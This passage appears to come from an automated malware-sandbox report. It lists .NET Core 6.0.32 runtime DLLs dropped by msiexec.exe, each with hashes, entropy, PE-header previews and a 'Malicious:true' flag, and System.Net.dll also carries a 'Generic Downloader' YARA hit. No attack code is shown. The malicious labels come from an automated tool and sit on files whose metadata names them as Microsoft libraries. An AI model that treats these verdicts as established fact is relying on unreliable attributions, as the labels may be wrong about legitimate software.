                                                                                                                                                                                                                                        SSDEEP:3072:Joi5C2iVJp9C2Mcz7qucR2iVY3qwJhliW3EMluskR2+8bICbOc:ai5C2sJrbMczOucR2lSskf8bIRc
                                                                                                                                                                                                                                        MD5:B060AEEE1F03574C9B567E1B7F2F4741
                                                                                                                                                                                                                                        SHA1:BBD28613E265B04047406B9149524DCC0B2CEA0A
                                                                                                                                                                                                                                        SHA-256:893512032A693DBA282A2C9A7A8D95A64D8099C267B62B868755FBB50A36AA5E
                                                                                                                                                                                                                                        SHA-512:5C3922E47AC5D24EE3B5BB8409D9AA0AFCFFA40F73A434ABAFB8AE7AFE42E06EABA3A81F79684F9BEC5589CA9F2CE09D67119D2C4BBFEA2819E8194360CEC130
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....K..........." ....."...>......................................................TM....`...@......@............... ......................................$L..p....b...(......x...P...T...............................................................H............text.... .......".................. ..`.data....6...@...8...$..............@....reloc..x............\..............@..B............................................0.......................t...,.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...h.....0.0.0.0.0.4.b.0...B.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...R.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebHeaderCollection.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60704
                                                                                                                                                                                                                                        Entropy (8bit):6.534824454137025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:jNfR5v+6SDbVXWTGEV3VulTTTTTTTTTTTTTTTTTTTTTTTTT0SWHzh:jH5KpXqGQ3VRSY9
                                                                                                                                                                                                                                        MD5:B1129490D0C33F7EA01D0366F8FEE431
                                                                                                                                                                                                                                        SHA1:B180A00E3A851C5E741D7ABAA58B1343FBAF839F
                                                                                                                                                                                                                                        SHA-256:6BA0F2C2C9FF2031956E15DFB376B19C54358CE3D3FE95BD1003EA026F908350
                                                                                                                                                                                                                                        SHA-512:980890ECF3D616629D5A9021CB6B5A3871A8E5948EF976D61EAF863C1856C933904517679E2F94E7E43E615174C8157570154A787CE1B6F7E6D26618A67E450E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....gR..........." ......................................................................`...@......@............... ......................................x".......... )..............T...............................................................H............text.............................. ..`.data...9...........................@....reloc..............................@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...V.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...N.e.t...W.e.b.H.e.a.d.e.r.C.o.l.l.e.c.t.i.o.n.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...f.....F.i.l.e.D.e.s.c.r.i.p.t.i.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebProxy.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):31904
                                                                                                                                                                                                                                        Entropy (8bit):6.54527100441263
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Q3WpNwWK3k/IKgZ3cZq2VUi6VGt1QWKlL/95a1NqOMUViKsYA6VFHRN7YBmo8R9f:QQqk/IdZx2Vd1HITUIKsFCl+moQ9zT
                                                                                                                                                                                                                                        MD5:BDD17CBF5A46DC3D656C2C730169A013
                                                                                                                                                                                                                                        SHA1:EE59429AEAC62F69EE4B13F79B2091847F5791B3
                                                                                                                                                                                                                                        SHA-256:AB719DBCC893F90B0FAC078E733707EA8B8B8457CD52D40D1CA60BCB1C0FF283
                                                                                                                                                                                                                                        SHA-512:4FBF49DD2E521C140828AABD69E90BB655E0ABC481A092966B64473D375A8B5A1E7038FF43B6E8310611D7812A6748772BCCA1AEC2DD818ED8134A6167B75F71
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....sd..........." .....H................................................................`...@......@............... ..................................t............T...(...p..........T...........................................................x...H............text..._F.......H.................. ..`.data...i....`.......J..............@....reloc.......p.......R..............@..B............................................0.......................d.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........|.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...X.....0.0.0.0.0.4.b.0...@.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...N.e.t...W.e.b.P.r.o.x.y...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...P.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m...N.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebSockets.Client.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):76568
                                                                                                                                                                                                                                        Entropy (8bit):6.486879247180926
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:e855wMIHHZGtiwpdI3OJckDDjH49YLOXCvzlchIbIJQ4zUWdC4dezF5g:P5ynwtxpS3a5DDjY9YLNblchIMrUCIPg
                                                                                                                                                                                                                                        MD5:3EDC4F4238DD043E45438DA61B13EA20
                                                                                                                                                                                                                                        SHA1:6133535D352BC23A25D82BB91DEBB7314BF09D8D
                                                                                                                                                                                                                                        SHA-256:022911160CB8430C2BC61076EADE816B739B410A3C677775FAC1AABEC3EE6193
                                                                                                                                                                                                                                        SHA-512:908512481F730F93BC7AFC3352356B99040F0A2B34980475B7DEFE38BFA167EF62349D1CCBD8692460F63DB684413197F2EDD156DAB9E319812A2532F8ED6FE7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" .........................................................0......R.....`...@......@............... ......................................8(...........)... ..........T...............................................................H............text...1........................... ..`.data...............................@....reloc....... ......................@..B............................................0...........................l.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...R.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...N.e.t...W.e.b.S.o.c.k.e.t.s...C.l.i.e.n.t.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...b.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebSockets.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):182040
                                                                                                                                                                                                                                        Entropy (8bit):6.636679003445195
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:MRYGqKe6VEqtNENTFsYz0UVUUAlTXRtnNzrepROMJwRuzTYZbQLmvhYst/Oo1BVQ:cqKJrWTSRzrijqu1mvh9tH1O/LR7hgS
                                                                                                                                                                                                                                        MD5:FB943368E3D0A8DDAF7FA61BCB5D17A7
                                                                                                                                                                                                                                        SHA1:41EACE094BE1DEDB08FA33AF0532CB3C965CCB94
                                                                                                                                                                                                                                        SHA-256:0761C0DD216C673BD2C195B3B5023DEC1A1EF1CC2CF7D6C4B7ACFE6D53D138F9
                                                                                                                                                                                                                                        SHA-512:C79F295C42DB420BF3E9E3344AA3431CD7A5556008709E2B62B32D22776BD5BCF95A8B397DBCB5EEBAA65C8F29DDE6C3341751579A88DF2283308C504B26685D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....;..........." .....d...8......................................................7.....`...@......@............... .................................. ....O..`........)..........P...T........................................................... ...H............text....b.......d.................. ..`.data....3.......4...f..............@....reloc..............................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........(.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18080
                                                                                                                                                                                                                                        Entropy (8bit):6.564696056239549
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:TV6EWw139N8HMWo9VaWVYA6VFHRN7YtQB6R9zqgSvK:TV6Er139hJFClXB29z6K
                                                                                                                                                                                                                                        MD5:C6E66B36C6BB32576CAB9AAA8BAFD3CA
                                                                                                                                                                                                                                        SHA1:E03AC51AC254F0C83177348ADB372DB7A7CC6F68
                                                                                                                                                                                                                                        SHA-256:3096786D4F35FAB8C7888739CE0685C19E90384CE2C84F0B4086F6AECD119FBF
                                                                                                                                                                                                                                        SHA-512:0CFDDABA675E81542837C54D49902346E59B2F3DFFA7654BB52DAECF5EB97CD67F13A8EA4F2BD402F49FC3D1B2356F29A2B9AF64ABB0925F1C4FC7196126CB36
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............2... ...@....... ....................................`.................................92..O....@..8................(...`......l1..T............................................ ............... ..H............text........ ...................... ..`.rsrc...8....@......................@..@.reloc.......`......................@..B................m2......H.......P .......................0......................................BSJB............v4.0.30319......l...X...#~..........#Strings....D.......#US.H.......#GUID...X...D...#Blob............T.........3....................................6.................l...|.l.....Y...............M.......m.....m...c.m.....m.....m.....m...'.m.....m.....m...^.............n...5.l.................S.....S.....S...).S...1.S...9.S...A.S...I.S...Q.S...Y.S...a.S...i.S...q.S...y.S.....S. ...S.....S...

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Numerics.Vectors.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.687048412668527
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:JrjAWaSBWvYA6VFHRN7AvxtHNsAR9z/qB:NlSFCl0ts89zM
                                                                                                                                                                                                                                        MD5:309039F112697E308D056D2158356900
                                                                                                                                                                                                                                        SHA1:189C30BF34796EEE0235E32B9BC700BEEF02F8D8
                                                                                                                                                                                                                                        SHA-256:64B6B0276153ED01CA5AB5F9025B77F0EB7B128DC70EF28772EA5F4908040982
                                                                                                                                                                                                                                        SHA-512:0E948DD2A3BF9AFA3A023EC11F9B084D8644F8992ACE329BA5C3F7272D70F98A09344E9BFEFB83581970250F558D86702FA7E55BF7DA4E80AF07C94D768772DC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............."!..0.............N*... ........@.. ..............................~.....`..................................)..W....@...................(...`......D)..8............................................ ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0*......H........ ..t...................P ........................................G..Umd.)..t..W.f..$:..$.!.#k..6....[......$.....a..Y.".+..7..*.ytc.s#./..3J..u._]0.....$!D..i..:.nI......'.#.r..?. l...BSJB............v4.0.30319......`...<...#~..........#Strings............#GUID...........#Blob......................3......................................D.........]...........v...................`...8.....0.......r...\.r.....r.....r.....r.....r.....r...}.r.....r...........6.....

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Numerics.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                                        Entropy (8bit):6.697117344335608
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:oYav7sTWeuNWLupWjA6Kr4PFHnhWgN7acWssrSwKUWX01k9z3A/bsJtZv:8vATWeuNWLuYA6VFHRN742R9zEAXF
                                                                                                                                                                                                                                        MD5:9018AA6B91AA5DF3C88005096ED2CD7E
                                                                                                                                                                                                                                        SHA1:368E11B37E6A8BFBA84D6E467E4778CEB1337A07
                                                                                                                                                                                                                                        SHA-256:A526F157B4A51A1AD9B466486EC1093512E089DBCE9406CE68F2A277F01D4CA4
                                                                                                                                                                                                                                        SHA-512:BAA1ADC058D33E9500AE3C5C2E7E09967203833676B39B04B489B062C603C0D269531830DBB8AB174750A061606B0C4A98E7F5AE41C1B31AE5FAE2067FF965B5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jC..........." ..0..............*... ...@....... ..............................,.....`..................................*..O....@..X................)...`.......)..T............................................ ............... ..H............text........ ...................... ..`.rsrc...X....@......................@..@.reloc.......`......................@..B.................*......H.......P ......................<)......................................BSJB............v4.0.30319......l...|...#~......@...#Strings....(.......#US.,.......#GUID...<.......#Blob............T.........3..........................................0.........]...............................D...?.e...K.e.....e.....e...".e.....e.....e...}.e.....e...V...........e.............-...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ObjectModel.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):91296
                                                                                                                                                                                                                                        Entropy (8bit):6.552192386026593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:h8ks3VsIlDmkz8gMnOQcdD1JqS4iA9mVzz:hPmVsILfD1J8neP
                                                                                                                                                                                                                                        MD5:521CF966B382E1EB5D9D01428228DAFF
                                                                                                                                                                                                                                        SHA1:EF28980F7AE17D97A3A75DD71BB7EF0C3ED27735
                                                                                                                                                                                                                                        SHA-256:73591E15ECBFA321B9F465F9456570CDE89DEE15D124151FD19757DFC8AD8467
                                                                                                                                                                                                                                        SHA-512:254181F918F52F1D1F78345D63BF25C048586342025A7667F123A15AD82C5631B1EE8665C6678C98B2D53D81486EC0ED972C893BB0F5EC071D147B98E5AE0B93
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....R..........." ..... ...................................................`.......M....`...@......@............... ..................................t....).......<...(...P..........T...........................................................x...H............text............ .................. ..`.data...H....0......."..............@....reloc.......P.......:..............@..B............................................0.......................d.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........|.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...X.....0.0.0.0.0.4.b.0...>.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...O.b.j.e.c.t.M.o.d.e.l.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...N.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m...O.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.CoreLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10637576
                                                                                                                                                                                                                                        Entropy (8bit):6.834783559373698
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:xKMweeI2ZQsU+fRIwvUVvJS63bXqPrLAU4n/0v4/PyGvjt:mC2SsU+fRI/VvJSyXiOyGvp
                                                                                                                                                                                                                                        MD5:7C5ED0C3E2AB441A064D45FA52283271
                                                                                                                                                                                                                                        SHA1:505A8AE8540487C3A13A29EB48512D07F0D3BD28
                                                                                                                                                                                                                                        SHA-256:B2F486B07E0EC96526CEDB244C6EE71F3FB41DFFE71DEE7DFB03F7D3E2731C3A
                                                                                                                                                                                                                                        SHA-512:EB2B02F4C4B1FA2F2D885CCA0B1C05D060EFBB5D14FB69828DAA29C9F0E02FA9C045AAF463F9DE180FC8B1DEFE249D52DDBDC342896EF85517946CA1C31D2E58
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..."G............" .........F...............................................P.......z....`...@......@............... ......................................d........(...).....|r......T...............................................................H............text.............................. ..`.data.............................@....reloc..|r......t..................@..B............................................0...........................<.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...x.....0.0.0.0.0.4.b.0...F.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...P.r.i.v.a.t.e...C.o.r.e.L.i.b.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...V.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.DataContractSerialization.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2077472
                                                                                                                                                                                                                                        Entropy (8bit):6.72870931628793
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:SjARoZ/R3NMBSsdt1VRDBaC3Eu4cu+SqsVDFWStODPPLn2DLDbme:CuUZFPbme
                                                                                                                                                                                                                                        MD5:3F837ADD0F62A2999E2FC22AEEF45587
                                                                                                                                                                                                                                        SHA1:74008D3205279C03EFBE6517FAF6C1FB35F3A3D7
                                                                                                                                                                                                                                        SHA-256:94338A56AE23EBA25980E2290DF1C7084F999385DE40455D6D7079E4F04A252D
                                                                                                                                                                                                                                        SHA-512:B1615F323FDA3B0BB9B31AEC5BDA50ACB6AA0758C7DDCB5F5E0611BD814DD0E9B0A02493A0EB04A8E88F35C88384E048C032D82A775E83E4593F455860BF3C2C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." ................................................................., ...`...@......@............... ..................................H...._..8....... )......,!..P...p...........................................................H...H............text...!........................... ..`.data...s|.......~..................@....reloc..,!......."...h..............@..B............................................0.......................8.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z..........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........P.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...,.....0.0.0.0.0.4.b.0...j.)...C.o.m.m.e.n.t.s...S.y.s.t.e.m...P.r.i.v.a.t.e...D.a.t.a.C.o.n.t.r.a.c.t.S.e.r.i.a.l.i.z.a.t.i.o.n.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...z.)...F.i.l.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Uri.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):252576
                                                                                                                                                                                                                                        Entropy (8bit):6.802013587081938
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:yp8ZfzHkVNCVweEiMw8lDw3ccZejsMMNt:yY7EVNveRqlDQccQjsRNt
                                                                                                                                                                                                                                        MD5:1F2700BAD871C050F72716C0CAFF7458
                                                                                                                                                                                                                                        SHA1:B2998EA702ADF8EE08494E33D89EE03816BB74E7
                                                                                                                                                                                                                                        SHA-256:9DEDF16199CD1080BB1E13698DC8CE32F2812C793B08454BC90B73A9035E4943
                                                                                                                                                                                                                                        SHA-512:99C9BC15B2CA677A5A6C963C81AF4B20E6D2128C0A117C3D6D23C6FBBB0A2616704682A61AEF7F9C5CE350114DC9669F993495D0F940B2115025D63318DD72C6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...$a7..........." .........&......................................................2.....`...@......@............... ..................................8....V...........(..............T...........................................................8...H............text...S........................... ..`.data.... ......."..................@....reloc..............................@..B............................................0.......................(.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z..........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........@.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Xml.Linq.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):405272
                                                                                                                                                                                                                                        Entropy (8bit):6.713111186922785
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:03P9cNr3NWeN35BpICdwtH/lKPmSZpcHMp3/:03uNr9WG1itH/G1ZpcHe
                                                                                                                                                                                                                                        MD5:1EBEFB503EB38EF1D4A87FE02DC730AA
                                                                                                                                                                                                                                        SHA1:CA95A54B131CD0E6F8CD0606068C1902F5631B6F
                                                                                                                                                                                                                                        SHA-256:0B015273A1AC4FE3C25A248E91ABD4D10C76D70242C1DCAE45EA2BD9402B46D1
                                                                                                                                                                                                                                        SHA-512:DC311F78C2E91C22B9921E6B11D6B2CCDB285E22ADC8A35071BFF4C6461C218A0C6F151256A88359DE0C1DD8D142FA6FF6174D5CE8E7B0A93634EE90F48F71C4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...5.N..........." .........j...............................................0.......[....`...@......@............... ......................................L....0.......)... ......0+..T...............................................................H............text...B........................... ..`.data...O`.......b..................@....reloc....... ......................@..B............................................0...........................`.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z..........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...H.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...P.r.i.v.a.t.e...X.m.l...L.i.n.q...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...X.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Xml.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8505608
                                                                                                                                                                                                                                        Entropy (8bit):6.821394087878173
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:04wrkcWo4NZeOfTZy0TaFqZlHX/UEewQbFo:RcGNZ1fTZFYQPjenb+
                                                                                                                                                                                                                                        MD5:43EC26D02606E233E8B10785D7B8B40C
                                                                                                                                                                                                                                        SHA1:478404CC0542C7B7DB249B9913CD1094D0A072D7
                                                                                                                                                                                                                                        SHA-256:11911797EA424D8103033A2D1D3D7352D92A7ADBF7297F91BDAD1D7918CDA122
                                                                                                                                                                                                                                        SHA-512:4859DBDD96AB539BB0929B3829110FABCF4D5DBEFA22729671E488258992CFA91B5BCF4BFCF1D3EA00CA78C4A19FEA7924F4862A3EFDA392FFD80B4033AA81E8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
